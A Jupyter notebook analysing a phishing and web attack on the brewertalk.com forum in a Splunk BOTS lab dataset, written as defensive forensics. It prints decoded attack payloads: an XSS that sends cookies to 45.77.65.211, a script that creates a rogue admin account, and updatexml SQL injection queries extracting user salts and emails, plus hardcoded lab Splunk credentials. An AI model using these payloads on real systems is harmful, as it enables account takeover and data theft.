# Introduction
In the analysis of the phising attack on the 24 august we also found some older traffic to the same C&C server. This notebook will analyse this attack


# Notebook setup

In [152]:
import json
import pandas as pd
import numpy as np
import urllib.parse


from IPython.display import display, Markdown,HTML, Latex
from intake_splunk.core import SplunkConnect
from treelib import Tree,Node

from proctree import ProcTree


pd.set_option('display.max_rows', 1000)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
pd.set_option('display.max_colwidth', 0)

s=SplunkConnect("https://localhost:8089")
s.auth("admin","superadmin")
SPL=s.read_pandas

#workaround for bug in IPython.display.JSON
def JSON(text):
    text_as_json=json.loads(text)
    print(json.dumps(text_as_json, indent=4))


The splunk search below return one of the http requests to the attackers C&C IP-address. From the http_refer it looks like a XSS on www.brewertalk.com sending the browser to the attacker web server at 45.77.65.211

In [85]:
df=SPL("index=botsv2 dest_ip=45.77.65.211 sourcetype=suricata http_refer | table _raw")
JSON(df["_raw"][0])

{
    "timestamp": "2017-08-15T16:35:52.803129-0700",
    "flow_id": 1877883951304597,
    "event_type": "http",
    "src_ip": "10.0.2.109",
    "src_port": 49681,
    "dest_ip": "45.77.65.211",
    "dest_port": 9999,
    "proto": "TCP",
    "tx_id": 0,
    "http": {
        "hostname": "45.77.65.211",
        "url": "/microsoftuserfeedbackservice?metric=mybb[lastvisit]=1502408189;%20mybb[lastactive]=1502408189",
        "http_user_agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "http_refer": "http://www.brewertalk.com/member.php?action=activate&uid=-1&code=%22%3E%3Cscript%3Edocument.location%3D%22http%3A%2F%2F45.77.65.211%3A9999%2Fmicrosoftuserfeedbackservice%3Fmetric%3D%22%20%2B%20document.cookie%3B%3C%2Fscript%3E",
        "http_method": "GET",
        "protocol": "HTTP/1.1",
        "status": 302,
        "redirect": "http://www.brewertalk.com/index.php",
        "length": 0
    }
}


After searching in Splunk for related events I also discovered a csp-report in splunk more or less confirming that this is malicious

In [56]:
df=SPL(""" index=botsv2 csp-report sourcetype="csp-violation" http://www.brewertalk.com/admin/index.php | head 1 | table _raw""")
csp_report=json.loads(df["_raw"][0])
print(json.dumps(csp_report, indent=4))

{
    "csp-report": {
        "blocked-uri": "self",
        "document-uri": "http://www.brewertalk.com/admin/index.php?module=forum-management&fid=5",
        "line-number": 313,
        "original-policy": "script-src http://www.brewertalk.com/jscripts/ http://www.brewertalk.com/admin/jscripts/; report-uri http://ec2-52-40-10-231.us-west-2.compute.amazonaws.com:8088/services/collector/raw?channel=6097FCB4-BEDF-4922-A75D-EE766DDFE9C5&token=6097FCB4-BEDF-4922-A75D-EE766DDFE9C5",
        "referrer": "http://www.brewertalk.com/admin/index.php?module=forum",
        "script-sample": "\n\t\t<!--\n\t\t$(\"#username\").select2({\n\t\t\tpl...",
        "source-file": "http://www.brewertalk.com/admin/index.php?module=forum-management&fid=5",
        "violated-directive": "script-src http://www.brewertalk.com/jscripts/ http://www.brewertalk.com/admin/jscripts/"
    }
}


below is the decoded javascript in the http_refer parameter above. The javascript will send the user cookie to the attacker and most likely make it possible for attacker to login to the member page

In [95]:
url="%22%3E%3Cscript%3Edocument.location%3D%22http%3A%2F%2F45.77.65.211%3A9999%2Fmicrosoftuserfeedbackservice%3Fmetric%3D%22%20%2B%20document.cookie%3B%3C%2Fscript%3E"
print(urllib.parse.unquote(url))

"><script>document.location="http://45.77.65.211:9999/microsoftuserfeedbackservice?metric=" + document.cookie;</script>


Below is a splunk search trying to see if we can find the malicious urls in sysmon data. We can see that FROTHLY\kevin.lagerfield opens outlook and most likely clicks a link there that opens chrome and firefox with malicious url

In [104]:
ProcTree(s).query(""" "http://www.brewertalk.com/member.php?action=activate" """).addrelatedprocs("NOT .tmp NOT .temp").show()

Stopping after 5 iterations
query
└── wrk-klagerf.frothly.local
    └── 2017-08-15T23:34:22.000+00:00? Create Process C:\Windows\Explorer.EXE (FROTHLY\kevin.lagerfield)
        ├── 2017-08-15T23:32:59.000+00:00 Create Process "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" (FROTHLY\kevin.lagerfield)
        ├── 2017-08-15T23:34:22.000+00:00 Create Process "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" (FROTHLY\kevin.lagerfield)
        │   ├── 2017-08-15T23:35:47.000+00:00 Create Process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "http://www.brewertalk.com/member.php?action=activate&amp;uid=-1&amp;code=%%22%%3e%%3Cscript%%3Edocument.location%%3D%%22http%%3A%%2F%%2F45.77.65.211%%3A9999%%2Fmicrosoftuserfeedbackservice%%3Fmetric%%3D%%22%%20%%2B%%20document.cookie%%3B%%3C%%2Fscript%%3E" (FROTHLY\kevin.lagerfield)
        │   │   ├── 2017-08-15T23:35:47.000+00:00 Create Process "C:\Program Files (x86)\Google\Chrome\Application\c

From the above chrome commandline there seems to be two urls with XSS:

* http://www.brewertalk.com/member.php?action
* http://www.brewertalk.com/admin/index.php


Searching the for the malicious url in splunk I found two phising emails

In [116]:
#8/15/17 11:31:25.988 PM from thebeerguy2112@gmail.com 
df=SPL(""" index=botsv2 sourcetype="stream:smtp" "http://www.brewertalk.com/member.php?action" | table content_body{} """)
print(df["content_body{}"][0])

--===============6779269757051170438==


Hi Kevin,

I think you are the new manager for brewertalk.com. I'm having trouble logging in.
>From my new account. Can you give it to me?

-The Beer Guy


Hi Kevin,<br>I think you are the new manager for <a href="http://brewertalk.com">brewertalk.com</a>. I'm having trouble logging in.
>From my new account. Can you give it to me? I see errors on 
 <a href='http://www.brewertalk.com/member.php?action=activate&uid=-1&code=">%3Cscript%3Edocument.location%3D%22http%3A%2F%2F45.77.65.211%3A9999%2Fmicrosoftuserfeedbackservice%3Fmetric%3D%22%20%2B%20document.cookie%3B%3C%2Fscript%3E'>this page</a>. 
<br>-The Beer Guy

.



In [117]:
#One day layter there is a nother e-mail
#8/16/17 3:14:37.885 PM from frankesters48@gmail.com
df=SPL("""index=botsv2 index=botsv2 sourcetype="stream:smtp" "http://www.brewertalk.com/admin/index.php" | table content_body{}""")
print(df["content_body{}"][0])

--===============4530090462158063636==


Kevin,

Thanks again for all the help taking over brewertalk. I almost forgot one of the most important 
things: backups! I tried to make this as easy as possible, you just need to visit this admin page on 
the site. Respond here if you need any assistance my friend.

-FE
frankesters48@gmail.com



Kevin,

Thanks again for all the help taking over brewertalk. I almost forgot one of the most important 
things: backups! I tried to make this as easy as possible, you just need to visit <a href='http://www.brewertalk.com/admin/index.php?module=user-titles&action=edit&utid=2%22%3E%3Cscript%3E%0Awindow.onload%3Dfunction(e)%7B%0A%20%20var%20my_post_key%20%3D%20document.getElementsByName(%22my_post_key%22)%5B0%5D.value%0A%20%20console.log(my_post_key)%3B%0A%20%20var%20postdata%3D%20%22my_post_key%3D%22%2Bmy_post_key%2B%22%26username%3DkIagerfield%26password%3Dbeer_lulz%26confirm_password%3Dbeer_lulz%26email%3DkIagerfield%40froth.ly%26usergroup%3D4%26addi

It is difficult to read the url encoded javascript. After decoding below it is clear that the scripts changes the password for the KIagerfield to "beer_lulz"

In [115]:
import urllib.parse
url='http://www.brewertalk.com/admin/index.php?module=user-titles&action=edit&utid=2%22%3E%3Cscript%3E%0Awindow.onload%3Dfunction(e)%7B%0A%20%20var%20my_post_key%20%3D%20document.getElementsByName(%22my_post_key%22)%5B0%5D.value%0A%20%20console.log(my_post_key)%3B%0A%20%20var%20postdata%3D%20%22my_post_key%3D%22%2Bmy_post_key%2B%22%26username%3DkIagerfield%26password%3Dbeer_lulz%26confirm_password%3Dbeer_lulz%26email%3DkIagerfield%40froth.ly%26usergroup%3D4%26additionalgroups%5B%5D%3D4%26displaygroup%3D4%22%3B%2F%2FPost%20the%20Data%0A%20%20var%20url%20%3D%20%22http%3A%2F%2Fwww.brewertalk.com%2Fadmin%2Findex.php%3Fmodule%3Duser-users%26action%3Dadd%22%3B%0A%20%20var%20http%3B%0A%20%20http%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20http.open(%22Post%22%2Curl)%3B%0A%0A%20%20http.setRequestHeader(%27Accept%27%2C%27text%2Fhtml%27)%3B%0A%20%20http.setRequestHeader(%27Content-type%27%2C%27application%2Fx-www-form-urlencoded%27)%3B%0A%20%20http.setRequestHeader(%27Accept%27%2C%27application%2Fxhtml%2Bxml%27)%3B%0A%20%20http.setRequestHeader(%27Accept%27%2C%27application%2Fxml%27)%3B%0A%20%20http.send(postdata)%3B%0A%20%20console.log(my_post_key)%3B%0A%7D%0A%3C%2Fscript%3E'
print(urllib.parse.unquote(url))

http://www.brewertalk.com/admin/index.php?module=user-titles&action=edit&utid=2"><script>
window.onload=function(e){
  var my_post_key = document.getElementsByName("my_post_key")[0].value
  console.log(my_post_key);
  var postdata= "my_post_key="+my_post_key+"&username=kIagerfield&password=beer_lulz&confirm_password=beer_lulz&email=kIagerfield@froth.ly&usergroup=4&additionalgroups[]=4&displaygroup=4";//Post the Data
  var url = "http://www.brewertalk.com/admin/index.php?module=user-users&action=add";
  var http;
  http = new XMLHttpRequest();
  http.open("Post",url);

  http.setRequestHeader('Accept','text/html');
  http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
  http.setRequestHeader('Accept','application/xhtml+xml');
  http.setRequestHeader('Accept','application/xml');
  http.send(postdata);
  console.log(my_post_key);
}
</script>


Looks like this was targeted at one user klagerfield@froth.ly. Below is a table the receivers and when they received the email

In [52]:
SPL("""index=botsv2 hbttp://www.brewertalk.com sourcetype="stream:smtp" | table _time,receiver{}""")

,_time,receiver{}
0,2017-08-16T15:14:37.885+00:00,klagerfield@froth.ly
1,2017-08-15T23:31:25.988+00:00,klagerfield@froth.ly


11.aug, 4 day before the first phising email the attacker has been running Web Application Attack and Audit Framework( waf) agains the site http://w3af.org/

In [119]:
SPL(""" index=botsv2 45.77.65.211 sourcetype=access_combined Trident | stats earliest(_time) as earliest,latest(_time) as latest,count by clientip| eval earliest=strftime(earliest,"%Y/%m/%d %H:%M:%S") |eval latest=strftime(latest,"%Y/%m/%d %H:%M:%S") | """)

,clientip,earliest,latest,count
0,45.77.65.211,2017/08/11 14:40:56,2017/08/11 14:46:44,4768


16.aug 3:25:06.844 the attacker was at least able to get the email, and password hashes adresses using the following sql injection error


In [156]:
df=SPL(""" index=botsv2 updatexml sourcetype="stream:http" dest_content!="" | table dest_content """)

From the below SQL injection code we can see that the attacker is able to extrac parameters from the database one by one

In [164]:
print(df["dest_content"][0])

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head profile="http://gmpg.org/xfn/11">
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Craft Brew Forums - Internal Error</title>
	<style type="text/css">
		body { background: #efefef; color: #000; font-family: Tahoma,Verdana,Arial,Sans-Serif; font-size: 12px; text-align: center; line-height: 1.4; }
		a:link { color: #026CB1; text-decoration: none;	}
		a:visited {	color: #026CB1;	text-decoration: none; }
		a:hover, a:active {	color: #000; text-decoration: underline; }
		#container { width: 600px; padding: 20px; background: #fff;	border: 1px solid #e4e4e4; margin: 100px auto; text-align: left; -moz-border-radius: 6px; -webkit-border-radius: 6px; border-radius: 6px; }
		h1 { margin: 0; background: url(/member.php?action=mybb_logo) no-repeat;	height: 82px; width: 248px; }
		#content { border: 1px solid #

List all SQL injection commands

In [168]:
from bs4 import BeautifulSoup
for i,row in df.iterrows():
    xml=BeautifulSoup(row["dest_content"])
    dd=xml.findAll("dd")
    print (dd[0])
    print (dd[1])

<dd>1105 - XPATH syntax error: ':IAu4XYea'</dd>
<dd>
			SELECT q.*, s.sid
			FROM mybb_questionsessions s
			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
			WHERE q.active='1' AND s.sid='makman' and updatexml(NULL,concat (0x3a,(SELECT salt FROM mybb_users ORDER BY UID LIMIT 1,1)),NULL) and '1'
		</dd>
<dd>1105 - XPATH syntax error: ':8'</dd>
<dd>
			SELECT q.*, s.sid
			FROM mybb_questionsessions s
			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
			WHERE q.active='1' AND s.sid='makman' and updatexml(NULL,concat (0x3a,(LENGTH((SELECT salt FROM mybb_users ORDER BY UID LIMIT 1,1)))),NULL) and '1'
		</dd>
<dd>1105 - XPATH syntax error: ':ghoppy@froth.ly'</dd>
<dd>
			SELECT q.*, s.sid
			FROM mybb_questionsessions s
			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
			WHERE q.active='1' AND s.sid='makman' and updatexml(NULL,concat (0x3a,(SELECT email FROM mybb_users ORDER BY UID LIMIT 1,1)),NULL) and '1'
		</dd>
<dd>1105 - XPATH syntax error: ':15'</dd>
<dd>
			SELECT q.*, s.sid
			FROM mybb_qu

In [169]:
#TODO What more did the attacker do?